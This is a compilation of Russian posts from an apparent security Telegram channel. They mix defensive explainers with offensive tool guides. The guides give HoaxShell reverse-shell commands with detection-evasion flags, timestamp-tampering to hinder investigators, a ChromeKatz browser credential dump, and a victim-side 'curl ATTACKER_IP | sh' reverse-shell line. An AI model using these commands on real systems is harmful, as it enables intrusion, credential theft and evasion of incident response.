HoaxShell: обратный шелл в маске веб-трафика

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что за инструмент: HoaxShell генерит PowerShell-пейлоады с подстроенными под реальные веб-запросы URL и хитрыми HTTP-заголовками, а шифрование и поддержка HTTPS делают их похожими на обычный браузерный трафик. Если связь прервётся - сессия легко восстановится

⏺Чем крут: не тупо обратный шелл - это такой виртуальный хамелеон в сети. Его сложно заметить и еще сложнее заблокировать, а настройка очень и очень легкая, а значит позволяет быстро адаптировать его под любую ситуацию.

⏺Как начать: Разворачиваете сервер, генерируете пейлоад с нужными параметрами и запускаете на целевой машине — и всё, связь установлена и маскирована под обычный веб-трафик.

ZeroDay | #Инструмент

Настроим PowerShell через HTTP с помощью Hoaxshell

👋 Приветствую в мире цифровой безопасности!

А теперь разберем, как работать с инструментом из прошлого поста

⏺Установка: Ставится легко — обычный git и pip:

git clone https://github.com/t3l3machus/hoaxshell  
cd ./hoaxshell  
sudo pip3 install -r requirements.txt  
chmod +x hoaxshell.py  

⏺Базовое подключение: Запускаем сервер на вашей машине:

sudo python3 hoaxshell.py -s <your_ip>

Сгенерируется PowerShell-пейлоад, готовый к запуску на машине.

⏺Хотите меньше палиться: Подставляем стандартный HTTP-заголовок, чтобы не ловиться на сигнатуры:

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

Можно ещё подгрузить свой .ps1:

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

А если потеряли сессию - восстанавливаем:

sudo python3 hoaxshell.py -s <your_ip> -g

⏺HTTPS и туннели: Есть поддержка HTTPS с самоподписанным или валидным сертификатом, а ещё - возможность прокинуть через Ngrok или LocalTunnel:

sudo python3 hoaxshell.py -ng  # через Ngrok  
sudo python3 hoaxshell.py -lt  # через LocalTunnel  

⏺И да кстати, интерактивные команды (типа powershell или cmd.exe) могут подвесить сессию. Всё, что нужно - запускать команды напрямую, не открывая консоль внутри консоли. Например:

cmd /c whoami
powershell echo 'Test'

ZeroDay | #Инструмент

Lotus Panda: взломы госструктур ЮВА

👋 Приветствую в мире цифровой безопасности!

Расскажу о APT-группировке Lotus-Panda.

⏺Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.

⏺Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.

⏺Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и datechanger.exe (подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.

⏺Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках про пентесте.

⏺Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.

zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint

⏺datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.

datechanger.exe -modify 01/01/2017 payload.exe

⏺ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.

ChromeKatz.exe -dump

ZeroDay | #пентест

Как мессенджеры шифруют сообщения (end-to-end) на самом деле

То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.

⏺В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.

ZeroDay | #Статья

BlackBird: массовый OSINT-поиск на 600 сайтах

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: BlackBird — OSINT-инструмент, который прочёсывает ~600 сайтов в поисках заданного ника. Соцсети, платформы, маргинальные форумы - если человек где-то светился под этим именем, вы об этом узнаете.

⏺В чём крутость: Это не браузерный кликер. BlackBird работает асинхронно, сразу стреляя пачкой HTTP-запросов.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.

ZeroDay | #Инструмент

🤯 Потерял 129 млн, но... отделался лёгким испугом! Как такое возможно?
Злоумышленники провели атаку «отравленными» адресами: отправили «пыль» (1.01 USDT) с кошелька, похожего на адрес контрагента жертвы.

Через минуту после пробной транзакции, пользователь получил «пыль» с фальшивого кошелька, копирующего оригинальный адрес в начале и в конце. Не проверив символы, он отправил $129 млн… прямо в руки мошенника.

🙂 Новость облетела интернет за сутки. Мошенник, возможно, испугался подобной огласки и вернул украденное обратно.

Будьте в курсе сомнительных схем. На канале КоинКит — экспертные разборы, расследования и рекомендации по защите активов.
А еще обезопась себя с промокодом GIFT10 на 10 проверок в КоинКит Лайт

Оставайтесь в безопасности с @coinkyt!

Боковые каналы: утечка данных без взлома

👋 Приветствую в мире цифровой безопасности!

Поговорим о не банальном векторе атаки - side-channel attacks.

⏺Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.

Посмотрим на примеры таких атак:

1️⃣Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.

⏺Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.

⏺Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.

ZeroDay | #sidechannel

Защищаем Linux-сервер от lateral movement

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как закрыть сервер от “горизонтального перемещения” злоумышленника внутри сети.

⏺Блокируем лишний исходящий трафик: По умолчанию сервер может соединяться с любым адресом. Исправим:

# Оставим только DNS и APT
iptables -P OUTPUT DROP
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d deb.debian.org -j ACCEPT

⏺Отключаем LLMNR и mDNS: Протоколы локального разрешения имён - подарок для атакующего. На проде не нужны:

echo "LLMNR=no" >> /etc/systemd/resolved.conf
systemctl restart systemd-resolved

# mDNS
systemctl stop avahi-daemon
systemctl disable avahi-daemon

⏺Ограничиваем доступ к сокетам ядра: /proc и /sys — часто недооценённая угроза. Убираем излишнюю информацию:

mount -o remount,hidepid=2 /proc
chmod 700 /boot

⏺Контролируем вход по SSH по UID: Создаём отдельного пользователя, которому разрешён доступ наружу, а всем остальным — нет:

iptables -A OUTPUT -m owner --uid-owner safeuser -j ACCEPT
iptables -A OUTPUT -j DROP

ZeroDay | #безопасность

Скрытые языки: как инженеры общаются без документации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.

⏺Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».

⏺Примеры скрытого языка на практике:

1️⃣“Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.

# Python
@router.get("/profile/{id}")
def get_profile(id: int):
    cached = redis.get(id)
    if cached:
        return cached
    profile = db.fetch(id)
    redis.set(id, profile)
    return profile

2️⃣“Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных

// Go
switch msg.Type {
case MsgCreate:
    return s.handleCreate(msg)
case MsgDelete:
    return s.handleDelete(msg)
default:
    logger.Warn("unknown message", zap.String("type", msg.Type))
}

3️⃣deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:

# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api

Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.

ZeroDay | #безопасность

Данные на продажу: что происходит с инфой после утечек

То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.

⏺В статье рассказывают, как работает рынок украденных данных: кто продаёт и кто покупает, где торгуют, почему утечка может стоить $20 или $500, и зачем сама служба безопасности иногда выкупает свои же базы. Покажут, как выглядит сделка: от залитого архива до анонимной оплаты Monero.

ZeroDay | #Статья

Platypus: менеджер обратных shell-сессий на Go

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Platypus - современный менеджер обратных shell-сессий на Go, который может запускать и управлять кучей подключений одновременно. В общем, можно забыть о вечных танцах с командной строкой. У Platypus есть и терминальный интерфейс, и веб-панель, и даже API, чтобы автоматизировать всё что угодно.

⏺Установка максимально простая:

git clone https://github.com/WangYihang/Platypus
cd Platypus
make install_dependency
make release
./Platypus

⏺Или через Docker:

docker-compose up -d

Готовая reverse shell-команда для жертвы:

curl http://ATTACKER_IP:13337/ | sh

ZeroDay | #Инструмент

📝 Как работает Defense in Depth?

Defense in Depth — это концепция «многослойной защиты»: если один уровень пробит, следующий всё ещё держит оборону. Типо цифрового замка с несколькими дверями.

Вот как это работает по слоям 👇

1️⃣Пользователь и устройства — антивирусы, шифрование, MFA. Всё, чтобы злоумышленник не начал с лёгкой жертвы.

2️⃣Сеть - firewall, VPN, IDS. Препятствия на маршруте пакета, прежде чем он вообще доберётся до цели.

3️⃣Приложения и сервисы - защита API, контроль доступа, безопасная разработка. Код без дыр - меньше поводов для взлома.

4️⃣Данные — шифрование, резервное копирование, защита от утечек. Даже если добрались - ничего не унесут.

5️⃣Мониторинг и реагирование - SIEM, логи, алерты, playbook’и. Увидели, что что-то пошло не так, быстро ответили.

ZeroDay | #defenseindepth